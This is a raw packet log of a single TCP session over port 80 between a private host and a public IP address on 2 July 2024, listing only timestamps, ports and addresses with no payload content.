Jul 2, 2024 07:31:07.688215017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688400030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688411951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688421965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688432932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688448906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688456059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688510895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688697100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688708067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688739061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688740015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688751936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688761950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688772917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.688781023 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688808918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.688822031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689007044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689047098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689121008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689136982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689147949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689158916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689167023 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689171076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689182997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689188004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689193964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689203978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689217091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689237118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689275980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689707994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689719915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689729929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689740896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689753056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689762115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689764023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689774036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689785004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689794064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689795971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689806938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689815998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689819098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.689831018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689850092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.689881086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.690399885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690411091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690422058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690428019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690438986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690449953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690455914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690465927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690476894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690489054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690500975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690500975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.690511942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690522909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690532923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.690536022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.690552950 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.690562010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.690596104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691315889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691327095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691339016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691356897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691366911 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691366911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691380978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691385984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691394091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691404104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691409111 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691414118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691431046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691448927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691458941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691461086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691461086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691469908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691481113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.691487074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691504002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.691523075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692297935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692310095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692320108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692333937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692344904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692353010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692357063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692368031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692378044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692389011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692398071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692399979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692414045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692418098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692425013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692435980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692436934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692446947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692450047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692459106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.692480087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.692503929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.693156958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.693169117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.693180084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.693192005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.693202972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.693207979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.693243027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.693253040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811309099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811321020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811331987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811341047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811352015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811362982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811372995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811382055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811383963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811424017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811439991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811440945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811450958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811461926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811463118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811471939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811484098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811494112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811499119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811506033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811517954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811528921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811537981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811564922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811739922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811783075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811943054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811954975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811965942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811976910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811988115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.811992884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.811999083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812010050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812020063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812022924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.812031031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812041998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812051058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.812052965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812063932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812071085 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.812076092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812086105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812089920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.812097073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.812100887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.812131882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813117027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813128948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813138962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813150883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813159943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813160896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813172102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813182116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813188076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813194990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813209057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813219070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813220024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813231945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813239098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813241959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813252926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813263893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813273907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813277006 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813285112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813302994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813333035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813513041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813524961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813551903 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813561916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813680887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813692093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813704014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813719988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813719988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813733101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813733101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813744068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813751936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813755035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813766003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813771009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813776970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813788891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813798904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813798904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813810110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813816071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813821077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.813841105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.813868046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814151049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814162016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814172029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814182997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814193964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814193964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814205885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814212084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814215899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814227104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814239979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814255953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814269066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814270973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814280033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814291954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814296007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814301014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814311981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814321995 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814323902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814335108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814347029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.814349890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814364910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.814390898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.815119028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815129995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815140963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815151930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815162897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.815164089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815175056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815186024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815192938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.815196991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.815226078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.815236092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932257891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932288885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932298899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932430029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932430029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932439089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932449102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932461977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932481050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932492971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932512999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932575941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932586908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932615995 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932626009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932744980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932755947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932765961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932775974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932784081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932786942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932796955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932802916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932818890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932840109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.932981968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.932995081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933022022 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933027029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933042049 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933046103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933056116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933069944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933069944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933082104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933105946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933374882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933386087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933396101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933406115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933413029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933418989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933425903 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933430910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933442116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933444023 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933463097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933481932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933949947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933959961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933969021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933978081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933988094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.933990955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.933998108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934006929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934011936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934015989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934026957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934035063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934039116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934050083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934052944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934060097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934066057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934068918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934079885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934088945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934107065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934118032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934729099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934737921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934746981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934756041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934766054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934773922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:07.934776068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:07.934786081 CEST	80	49730	40.86.87.10	192.168.2.4
